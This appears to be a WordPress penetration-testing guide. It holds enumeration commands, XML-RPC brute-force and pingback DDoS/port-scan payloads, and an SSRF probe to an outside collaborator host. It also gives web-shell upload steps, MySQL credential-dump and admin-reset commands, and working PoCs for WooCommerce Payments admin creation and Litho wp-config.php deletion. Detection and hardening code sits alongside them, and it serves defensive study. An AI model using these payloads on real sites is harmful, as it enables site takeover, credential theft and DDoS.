Wordpress

Reading time: 25 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

  • Uploaded files go to: http://10.10.10.10/wp-content/uploads/2018/08/a.txt

  • Theme files can be found in /wp-content/themes/, so if you modify some PHP of a theme to get RCE you will probably use that path. For example: with the theme twentytwelve you can reach the 404.php file at: /wp-content/themes/twentytwelve/404.php

  • Another URL that can be useful is: /wp-content/themes/default/404.php

  • In wp-config.php you can find the root password of the database.

  • Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/

Main WordPress Files

  • index.php
  • license.txt contains useful information such as the installed WordPress version.
  • wp-activate.php is used for the email activation process when setting up a new WordPress site.
  • Login folders (may be renamed to hide them):
    • /wp-admin/login.php
    • /wp-admin/wp-login.php
    • /login.php
    • /wp-login.php
  • xmlrpc.php is a file that represents a WordPress feature that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
  • The wp-content folder is the main directory where plugins and themes are stored.
  • wp-content/uploads/ is the directory where any files uploaded to the platform are stored.
  • wp-includes/ is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
  • wp-sitemap.xml: in WordPress 5.5 and later, WordPress generates a sitemap XML file with all public posts and publicly queryable post types and taxonomies.

Post exploitation

  • The wp-config.php file contains the information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to enable DEBUG mode, which can be useful for troubleshooting.

User Permissions

  • Administrator
  • Editor: Publishes and manages their own and others' posts
  • Author: Publishes and manages their own posts
  • Contributor: Writes and manages their posts but cannot publish them
  • Subscriber: Browses posts and edits their profile

Passive Enumeration

Get WordPress version

Check if you can find the files /license.txt or /readme.html

Inside the source code of the page (example from https://wordpress.org/support/article/pages/):

  • grep
bash
curl https://victim.com/ | grep 'content="WordPress'

  • meta name

  • CSS link files

  • JavaScript files

Get Plugins

bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Get Themes

bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Extract versions in general

bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Active enumeration

Plugins and Themes

You probably won't be able to find all the plugins and themes possible. In order to discover all of them, you will need to actively brute force a list of plugins and themes (luckily for us there are automated tools that contain these lists).

Users

  • ID Brute: You get valid users from a WordPress site by brute forcing user IDs:
bash
curl -s -I -X GET http://blog.example.com/?author=1

If the responses are 200 or 30X, that means the id is valid. If the response is 400, then the id is invalid.

  • wp-json: You can also try to get information about the users by querying:
bash
curl http://blog.example.com/wp-json/wp/v2/users

Another /wp-json/ endpoint that can reveal some information about users is:

bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

Note that this endpoint only exposes users that have made a post. Only information about users who have this feature enabled will be provided.

Also note that /wp-json/wp/v2/pages could leak IP addresses.

  • Login username enumeration: When logging in at /wp-login.php, the message is different depending on whether the indicated username exists or not.
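The probes in the list above leave a recognisable trail in the web server log. The following Python script is an added example, not part of the original page: it parses constructed access-log lines (combined log format) and reports clients that walk ?author= IDs or hit the REST users / oEmbed routes. The log lines, the client IPs and the threshold of three distinct author IDs are assumptions made for the demonstration.

```python
"""Flag WordPress user-enumeration probes in a web server access log."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2024:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.5 - - [10/Aug/2024:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0
203.0.113.5 - - [10/Aug/2024:10:00:03 +0000] "GET /?author=3 HTTP/1.1" 404 0
203.0.113.5 - - [10/Aug/2024:10:00:04 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812
198.51.100.7 - - [10/Aug/2024:10:05:00 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5120
198.51.100.7 - - [10/Aug/2024:10:05:10 +0000] "GET /?author=1 HTTP/1.1" 301 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target: str):
    """Map one request target to an enumeration technique label, or None."""
    parts = urlsplit(target)
    if "author" in parse_qs(parts.query):
        return "author-id"                      # /?author=N redirects to /author/<login>/
    path = parts.path.rstrip("/")
    if path.endswith("/wp-json/wp/v2/users"):
        return "rest-users"                     # lists users that have published content
    if "/wp-json/oembed/1.0/embed" in path:
        return "oembed"                         # embeds a post together with its author_name
    return None


def find_enumeration(log_text: str, author_threshold: int = 3) -> dict:
    """Return {client_ip: [techniques]} for clients that look like they enumerate users.

    A client is reported when it touches the REST/oEmbed user routes at all,
    or when it requests at least `author_threshold` distinct ?author= IDs
    (a single author link followed from a normal page view is not enough).
    """
    author_ids = defaultdict(set)
    techniques = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label is None:
            continue
        if label == "author-id":
            author_ids[m["ip"]].update(parse_qs(urlsplit(m["target"]).query)["author"])
        else:
            techniques[m["ip"]].add(label)

    flagged = {}
    for ip in set(author_ids) | set(techniques):
        techs = set(techniques.get(ip, ()))
        if len(author_ids.get(ip, ())) >= author_threshold:
            techs.add("author-id")
        if techs:
            flagged[ip] = sorted(techs)
    return flagged


if __name__ == "__main__":
    for ip, techs in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(techs)}")
```

Running it on the sample reports 203.0.113.5 for both the author-ID walk and the REST users route, while 198.51.100.7 stays below the author threshold. Lowering `author_threshold` to 1 shows how noisy the author rule becomes on its own, which is why the REST and oEmbed hits are weighted separately.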

XML-RPC

If xml-rpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks against other resources. (You can automate this process using this, for example).

To see if it is active try to access /xmlrpc.php and send this request:

Check

xml
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Credentials Bruteforce

wp.getUserBlogs, wp.getCategories or metaWeblog.getUsersBlogs are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:

xml
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

The message "Incorrect username or password" inside a 200 code response should appear if the credentials are not valid.

Using the correct credentials you can upload a file. In the response the path will appear (https://gist.github.com/georgestephanis/5681982)

xml
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

There is also a faster way to brute-force credentials using system.multicall, as you can try several credentials in the same request:

Bypass 2FA

This method is meant for programs and not for humans, and it's old, therefore it doesn't support 2FA. So, if you have valid creds but the main entrance is protected by 2FA, you might be able to abuse xmlrpc.php to login with those creds bypassing 2FA. Note that you won't be able to perform all the actions you can do through the console, but you might still be able to get to RCE as Ippsec explains in https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s

DDoS or port scanning

If you can find the method pingback.ping inside the list you can make WordPress send an arbitrary request to any host/port.
This can be used to ask thousands of WordPress sites to access one location (so a DDoS is caused in that location) or you can use it to make WordPress scan some internal network (you can indicate any port).

xml
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR SERVER>:<port></string></value></param>
<param><value><string>http://<SOME VALID BLOG FROM THE SITE></string></value></param>
</params>
</methodCall>

If you get a faultCode with a value greater than 0 (17), it means the port is open.

Take a look at the use of system.multicall in the previous section to learn how to abuse this method to cause DDoS.

DDoS

xml
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
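The two XML-RPC abuses described above (credential guessing folded into system.multicall, and pingback.ping pointed at an internal host or an unusual port) can be spotted in the request body before xmlrpc.php handles it. The Python filter below is an added example, not code from the page or from WordPress: it parses the envelope with the standard library and returns findings for those two patterns. The sample bodies, the list of credential-taking methods and the per-request limit of five such calls are constructed assumptions.

```python
"""Pre-filter for XML-RPC request bodies aimed at xmlrpc.php."""
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Methods that accept a username/password pair and so enable credential guessing.
CREDENTIAL_METHODS = {
    "wp.getUsersBlogs", "wp.getUserBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs",
}
# Assumption: a legitimate client rarely needs more than this many such calls per request.
MULTICALL_LIMIT = 5


def _nested_method_names(root):
    """Yield the methodName of every call bundled inside a system.multicall."""
    for member in root.iter("member"):
        if member.findtext("name") == "methodName":
            value = member.find("value")
            if value is not None:
                yield "".join(value.itertext()).strip()


def _suspicious_pingback_source(url: str) -> bool:
    """True when the pingback 'source' URL targets a private/loopback address or a non-web port."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
        if addr.is_private or addr.is_loopback:
            return True
    except ValueError:
        pass  # a hostname rather than a literal address; fall through to the port check
    return parts.port not in (None, 80, 443)


def inspect_xmlrpc(body: str) -> list:
    """Return a list of findings for one request body; an empty list means nothing matched."""
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML-RPC body"]
    method = (root.findtext("methodName") or "").strip()
    if method == "system.multicall":
        cred_calls = sum(1 for n in _nested_method_names(root) if n in CREDENTIAL_METHODS)
        if cred_calls > MULTICALL_LIMIT:
            findings.append(f"system.multicall bundles {cred_calls} credential-taking calls")
    elif method == "pingback.ping":
        # first <string> is the 'source' URL the server will fetch, second is the local post
        strings = [s.text or "" for s in root.iter("string")]
        if strings and _suspicious_pingback_source(strings[0]):
            findings.append(f"pingback.ping source points at {strings[0]}")
    return findings


# Constructed sample bodies used to exercise the filter offline.
LIST_METHODS = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"

PINGBACK_INTERNAL = (
    "<methodCall><methodName>pingback.ping</methodName><params>"
    "<param><value><string>http://10.0.0.5:22/</string></value></param>"
    "<param><value><string>http://blog.example/2024/08/hello-world/</string></value></param>"
    "</params></methodCall>"
)


def multicall_body(n: int) -> str:
    """Build a system.multicall envelope naming wp.getUsersBlogs n times (parameters left empty)."""
    one_call = (
        "<value><struct>"
        "<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
        "<member><name>params</name><value><array><data/></array></value></member>"
        "</struct></value>"
    )
    return (
        "<methodCall><methodName>system.multicall</methodName>"
        "<params><param><value><array><data>" + one_call * n + "</data></array></value></param></params>"
        "</methodCall>"
    )


if __name__ == "__main__":
    for name, body in [("listMethods", LIST_METHODS), ("multicall x8", multicall_body(8)),
                       ("pingback", PINGBACK_INTERNAL)]:
        print(name, "->", inspect_xmlrpc(body) or "clean")
```

In a deployment this sits in front of xmlrpc.php (a WAF rule or a small reverse-proxy hook); the same parse also gives you the method name to log, which is what you need for rate-limiting pingback.ping and the credential-taking methods per source IP.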

wp-cron.php DoS

This file usually exists under the root of the WordPress site: /wp-cron.php
When this file is accessed a "heavy" MySQL query is performed, so it could be used by attackers to cause a DoS.
Also, by default, wp-cron.php is called on every page load (any time a client requests any WordPress page), which on high-traffic sites can cause problems (DoS).

It is recommended to disable Wp-Cron and create a real cronjob inside the host that performs the needed actions at regular intervals (without causing issues).

/wp-json/oembed/1.0/proxy - SSRF

Try to access https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net and the WordPress site may make a request to you.

This is the response when it doesn't work:

SSRF

https://github.com/t0gu/quickpress/blob/master/core/requests.go

This tool checks whether methodName: pingback.ping exists and for the path /wp-json/oembed/1.0/proxy; if they exist, it tries to exploit them.

Automatic Tools

bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up to 50 searches)
#You can try to bruteforce the admin user using wpscan with "-U admin"

Get access by overwriting a bit

More than a real attack this is a curiosity. In the CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man you could flip 1 bit of any WordPress file. So you could flip position 5389 of the file /var/www/html/wp-includes/user.php to NOP the NOT (!) operation.

php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
    return new WP_Error(

Panel RCE

Modifying a PHP file from the theme in use (admin credentials needed)

Appearance → Theme Editor → 404 Template (on the right)

Change the content for a PHP shell:

Search the internet for how to access that updated page. In this case you have to access here: http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

You can use:

bash
use exploit/unix/webapp/wp_admin_shell_upload

to get a session.

Plugin RCE

PHP plugin

It is possible to upload .php files as a plugin.
Create your PHP backdoor, for example:

Then add a new plugin:

Upload the plugin and press Install Now:

Click on Proceed:

Probably this won't do anything apparently, but if you go to Media, you will see your shell uploaded:

Access it and you will see the URL to execute the reverse shell:

Uploading and activating a malicious plugin

This method involves the installation of a malicious plugin known to be vulnerable and can be exploited to obtain a web shell. This process is carried out through the WordPress dashboard as follows:

  1. Plugin Acquisition: The plugin is obtained from a source like Exploit DB like here.
  2. Plugin Installation:
    • Navigate to the WordPress dashboard, then go to Dashboard > Plugins > Upload Plugin.
    • Upload the zip file of the downloaded plugin.
  3. Plugin Activation: Once the plugin is successfully installed, it must be activated through the dashboard.
  4. Exploitation:
    • With the plugin "reflex-gallery" installed and activated, it can be exploited as it is known to be vulnerable.
    • The Metasploit framework provides an exploit for this vulnerability. By loading the appropriate module and executing specific commands, a meterpreter session can be established, granting unauthorized access to the site.
    • It's noted that this is just one of the many methods to exploit a WordPress site.

The content includes visual aids depicting the steps in the WordPress dashboard for installing and activating the plugin. However, it's important to note that exploiting vulnerabilities in this manner is illegal and unethical without proper authorization. This information should be used responsibly and only in a legal context, such as penetration testing with explicit permission.

For more detailed steps check: https://www.hackingarticles.in/wordpress-reverse-shell/

From XSS to RCE

  • WPXStrike: WPXStrike is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in WordPress. For more info check this post. It provides support for WordPress versions 6.X.X, 5.X.X and 4.X.X and allows to:
    • Privilege Escalation: Creates a user in WordPress.
    • (RCE) Custom Plugin (backdoor) Upload: Upload your custom plugin (backdoor) to WordPress.
    • (RCE) Built-In Plugin Edit: Edit built-in plugins in WordPress.
    • (RCE) Built-In Theme Edit: Edit built-in themes in WordPress.
    • (Custom) Custom Exploits: Custom exploits for third-party WordPress plugins/themes.

Post Exploitation

Extract usernames and passwords:

bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

Change the admin password:

bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

Wordpress Plugins Pentest

Attack Surface

Knowing how a WordPress plugin can expose functionality is key to finding vulnerabilities in its functionality. You can find how a plugin might expose functionality in the following points and some examples of vulnerable plugins in this blog post.

  • wp_ajax

One of the ways a plugin can expose functions to users is via AJAX handlers. These could contain logic, authorization, or authentication bugs. Moreover, it's quite frequent that these functions base both authentication and authorization on the existence of a WordPress nonce which any user authenticated in the WordPress instance might have (independently of its role).

These are the functions that can be used to expose a function in a plugin:

php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));

The use of nopriv makes the endpoint accessible by any user (even unauthenticated ones).

caution

Moreover, if the function is just checking the authorization of the user with the function wp_verify_nonce, this function is only checking that the user is logged in; it usually isn't checking the role of the user. So low privileged users might have access to high privileged actions.

  • REST API

It is also possible to expose functions from WordPress by registering a REST API route using the register_rest_route function:

php
register_rest_route(
    $this->namespace, '/get/', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => array($this, 'getData'),
        'permission_callback' => '__return_true'
    )
);

The permission_callback is a callback to a function that checks whether a given user is authorized to call the API method.

If the built-in __return_true function is used, it simply skips the user permissions check.

  • Direct access to the php file

Of course, WordPress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin exposes any vulnerable functionality that is triggered just by accessing the file, it's going to be exploitable by any user.

Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)

Some plugins implement "trusted header" shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.

  • Impact: unauthenticated privilege escalation to admin by creating a new administrator via the core users REST route.
  • Example header: X-Wcpay-Platform-Checkout-User: 1 (forces user ID 1, usually the first administrator account).
  • Affected route: POST /wp-json/wp/v2/users with an elevated role array.

PoC

http
POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114

{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}

Why it works

  • The plugin maps a client-controlled header to authentication state and skips capability checks.
  • WordPress core expects the create_users capability for this route; the plugin hack bypasses it by setting the current user context directly from the header.

Expected success indicators

  • HTTP 201 with a JSON body describing the created user.
  • A new admin user visible in wp-admin/users.php.

Detection checklist

  • Grep for getallheaders(), $_SERVER['HTTP_...'], or vendor SDKs that read custom headers to set the user context (e.g., wp_set_current_user(), wp_set_auth_cookie()).
  • Review REST registrations for privileged callbacks that lack robust permission_callback checks and rely on request headers instead.
  • Look for uses of core user-management functions (wp_insert_user, wp_create_user) in REST handlers that are gated only by header values.

Hardening

  • Never derive authentication or authorization from client-controlled headers.
  • If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., unset X-Wcpay-Platform-Checkout-User at the edge), then pass a signed token and verify it server-side.
  • For REST routes performing privileged actions, require current_user_can() checks with a strict permission_callback (NOT __return_true).
  • Prefer first-party auth (cookies, application passwords, OAuth) over header "impersonation".

References: see the links at the end of this page for the public case and broader analysis.
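To make the hardening points concrete, here is an added Python model (not code from WooCommerce Payments or from the page) of two identity resolvers for the users route: one believes the client-supplied X-Wcpay-Platform-Checkout-User header, the other accepts only an HMAC-signed, time-limited assertion that a reverse proxy attaches after authenticating the caller, and both still require the create_users capability. The shared secret, the X-Proxy-Identity header name, the token format and the user table are assumptions.

```python
"""Identity from a client-controlled header vs. a signed proxy assertion."""
import hashlib
import hmac
import time
from typing import Callable, Optional

# Constructed values: the secret would be provisioned to the proxy and the app out of band.
PROXY_SECRET = b"constructed-shared-secret-rotate-me"
IDENTITY_HEADER = "X-Wcpay-Platform-Checkout-User"   # the header named in the advisory above
ASSERTION_HEADER = "X-Proxy-Identity"                 # hypothetical header carrying the signed assertion

# Constructed user table: user ID -> capabilities (what current_user_can() would consult).
USERS = {
    1: {"create_users", "manage_options"},
    7: {"read"},
}


def vulnerable_current_user(headers: dict, now: Optional[int] = None) -> Optional[int]:
    """Believes the impersonation header outright; this is the pattern the text describes."""
    raw = headers.get(IDENTITY_HEADER)
    return int(raw) if raw and raw.isdigit() else None


def sign_identity(user_id: int, issued_at: int, secret: bytes = PROXY_SECRET) -> str:
    """What the proxy attaches after it has authenticated the caller: 'uid.issued.hexmac'."""
    mac = hmac.new(secret, f"{user_id}.{issued_at}".encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{issued_at}.{mac}"


def hardened_current_user(headers: dict, now: Optional[int] = None, max_age: int = 60) -> Optional[int]:
    """Accept an identity only from a fresh assertion whose MAC verifies under the shared secret."""
    fields = headers.get(ASSERTION_HEADER, "").split(".")
    if len(fields) != 3 or not (fields[0].isdigit() and fields[1].isdigit()):
        return None
    uid, issued, mac = fields
    expected = hmac.new(PROXY_SECRET, f"{uid}.{issued}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    now = int(time.time()) if now is None else now
    if now - int(issued) > max_age:          # replayed or stale assertion
        return None
    return int(uid)


def create_user_route(headers: dict, resolve_user: Callable, now: Optional[int] = None) -> int:
    """HTTP status a POST /wp-json/wp/v2/users handler returns with the given identity resolver.

    The capability check is identical in both cases; the only difference is
    whether an unauthenticated caller gets to choose the identity it runs as.
    """
    user_id = resolve_user(headers, now)
    if user_id is None:
        return 401
    if "create_users" not in USERS.get(user_id, set()):
        return 403
    return 201


if __name__ == "__main__":
    spoofed = {IDENTITY_HEADER: "1"}
    print("vulnerable, spoofed header:", create_user_route(spoofed, vulnerable_current_user))
    print("hardened, spoofed header:  ", create_user_route(spoofed, hardened_current_user))
    signed = {ASSERTION_HEADER: sign_identity(1, 1000)}
    print("hardened, signed assertion:", create_user_route(signed, hardened_current_user, now=1010))
```

The edge must still strip any inbound X-Proxy-Identity (and the legacy header) from client requests, otherwise the signed scheme only moves the problem; the MAC protects against forgery, the timestamp against replay, and the capability check remains the last line regardless of how the identity was established.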

Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)

WordPress themes and plugins frequently expose AJAX handlers through the wp_ajax_ and wp_ajax_nopriv_ hooks. When the nopriv variant is used the callback becomes reachable by unauthenticated visitors, so any sensitive action must additionally implement:

  1. A capability check (e.g. current_user_can() or at least is_user_logged_in()), and
  2. A CSRF nonce validated with check_ajax_referer() / wp_verify_nonce(), and
  3. Strict input sanitisation / validation.

The Litho multipurpose theme (< 3.1) forgot those 3 controls in the Remove Font Family feature and ended up shipping the following code (simplified):

php
function litho_remove_font_family_action_data() {
    if ( empty( $_POST['fontfamily'] ) ) {
        return;
    }
    $fontfamily = str_replace( ' ', '-', $_POST['fontfamily'] );
    $upload_dir = wp_upload_dir();
    $srcdir     = untrailingslashit( wp_normalize_path( $upload_dir['basedir'] ) ) . '/litho-fonts/' . $fontfamily;
    $filesystem = Litho_filesystem::init_filesystem();

    if ( file_exists( $srcdir ) ) {
        $filesystem->delete( $srcdir, FS_CHMOD_DIR );
    }
    die();
}
add_action( 'wp_ajax_litho_remove_font_family_action_data',        'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );

Issues introduced by this snippet:

  • Unauthenticated access – the wp_ajax_nopriv_ hook is registered.
  • No nonce / capability check – any visitor can hit the endpoint.
  • No path sanitisation – the user-controlled fontfamily string is concatenated into a filesystem path without filtering, allowing classic ../../ traversal.

Exploitation

An attacker can delete any file or directory below the uploads base directory (normally <wp-root>/wp-content/uploads/) by sending a single HTTP POST request:

bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
     -d 'action=litho_remove_font_family_action_data' \
     -d 'fontfamily=../../../../wp-config.php'

Because wp-config.php is outside uploads, a four-level ../ sequence is enough in a default installation. Deleting wp-config.php forces WordPress into the installation wizard on the next visit, enabling a full site takeover (the attacker simply supplies a new DB configuration and creates an admin user).

Other impactful targets include plugin/theme .php files (to break security plugins) or .htaccess rules.

Detection checklist

  • Any add_action( 'wp_ajax_nopriv_...') callback that invokes filesystem helpers (copy(), unlink(), $wp_filesystem->delete(), etc.).
  • Concatenation of unsanitised user input into paths (look for $_POST, $_GET, $_REQUEST).
  • Absence of check_ajax_referer() and current_user_can()/is_user_logged_in().

Hardening

php
function secure_remove_font_family() {
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'litho_fonts_nonce' );

    $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
    $base_dir   = realpath( wp_upload_dir()['basedir'] );
    $srcdir     = realpath( trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily );

    // realpath() returns false for a non-existent path, so check that before comparing prefixes;
    // the trailing separator stops 'uploads-old' from passing as a child of 'uploads'
    if ( false === $base_dir || false === $srcdir || ! str_starts_with( $srcdir, $base_dir . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    // … proceed …
}
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
//  🔒  NO wp_ajax_nopriv_ registration

tip

Always treat every write/delete operation on disk as privileged and double-check:
  • Authentication
  • Authorisation
  • Nonce
  • Input sanitisation
  • Path containment (e.g. via realpath() plus str_starts_with()).


Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")

Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restore path relies only on request parameters (e.g., $_REQUEST['reset-for']) and a plugin-maintained list, without checking capabilities or a valid nonce, this becomes a vertical privilege escalation.

A real-world example was found in the Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). The reset branch restored roles based on reset-for=<username> if the username appeared in the internal array $options['viewing_admin_as_role_are'], but did not perform a current_user_can() check or nonce verification before removing the current roles and re-adding the saved roles from the user meta _asenha_view_admin_as_original_roles:

php
// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
    $reset_for_username = sanitize_text_field( $_REQUEST['reset-for'] );
    $usernames = get_option( ASENHA_SLUG_U, [] )['viewing_admin_as_role_are'] ?? [];

    if ( in_array( $reset_for_username, $usernames, true ) ) {
        $u = get_user_by( 'login', $reset_for_username );
        foreach ( $u->roles as $role ) { $u->remove_role( $role ); }
        $orig = (array) get_user_meta( $u->ID, '_asenha_view_admin_as_original_roles', true );
        foreach ( $orig as $r ) { $u->add_role( $r ); }
    }
}

Why it's exploitable

  • Trusts $_REQUEST['reset-for'] and a plugin option without server-side authorization.
  • If a user previously had higher privileges saved in _asenha_view_admin_as_original_roles and was later downgraded, they can restore them by hitting the reset path.
  • In some deployments, any authenticated user could trigger the reset for another username still present in viewing_admin_as_role_are (broken authorization).

Attack prerequisites

  • Vulnerable plugin version with the feature enabled.
  • The target account has a stale high-privilege role stored in user meta from earlier use.
  • Any authenticated session; missing nonce/capability on the reset flow.

Exploitation (example)

bash
# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
# The plugin uses $_REQUEST, so GET or POST works. The exact route depends on the plugin hooks.
curl -s -k -b 'wordpress_logged_in=...' \
     'https://victim.example/wp-admin/?reset-for=<your_username>'

On vulnerable builds this removes the current roles and re-adds the stored original roles (e.g., administrator), effectively escalating privileges.

Detection checklist

  • Look for role-switching features that store "original roles" in user meta (e.g., _asenha_view_admin_as_original_roles).
  • Identify reset/restore paths that:
    • Read usernames from $_REQUEST / $_GET / $_POST.
    • Modify roles via add_role() / remove_role() without current_user_can() and wp_verify_nonce() / check_admin_referer().
    • Authorize based on a plugin option array (e.g., viewing_admin_as_role_are) rather than the actor's capabilities.

Hardening

  • Enforce capability checks in every state-changing branch (e.g., current_user_can('manage_options') or stricter).
  • Require nonces for all role/permission mutations and verify them: check_admin_referer() / wp_verify_nonce().
  • Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy.
  • Invalidate the "original roles" state on profile/role updates to avoid stale high-privilege restoration:
php
add_action( 'profile_update', function( $user_id ) {
    delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );
  • Consider storing minimal state and using short-lived, capability-guarded tokens for temporary role switches.
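Added Python model (not the ASE plugin's code) of a role switch that follows the hardening list above: switching requires the manage_options capability, the state stored in user meta is tied to a single-use token instead of a request-supplied username, and a real role change wipes the stored state so a stale token cannot restore administrator. The capability map, the meta key name and the token format are constructed.

```python
"""A 'view as role' switch that cannot hand back a stale role."""
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed capability map; WordPress derives this from its roles table.
ROLE_CAPS = {
    "administrator": {"manage_options", "edit_posts", "read"},
    "subscriber": {"read"},
}
META_KEY = "view_as_original_roles"   # hypothetical user-meta key standing in for the plugin's


@dataclass
class User:
    login: str
    roles: set
    meta: dict = field(default_factory=dict)   # stands in for user meta

    def can(self, cap: str) -> bool:
        return any(cap in ROLE_CAPS.get(r, set()) for r in self.roles)


def switch_role(actor: User, view_as: str) -> Optional[str]:
    """Start viewing as `view_as`. Returns a single-use token, or None when the actor may not switch."""
    if not actor.can("manage_options") or view_as not in ROLE_CAPS:
        return None
    token = secrets.token_hex(16)
    actor.meta[META_KEY] = {"roles": set(actor.roles), "token": token}
    actor.roles = {view_as}
    return token


def restore_role(actor: User, token: str) -> bool:
    """Restore the actor's own stored roles. The target is the authenticated actor, never a request parameter."""
    state = actor.meta.get(META_KEY)
    if state is None or not secrets.compare_digest(state["token"], token):
        return False
    actor.roles = set(state["roles"])
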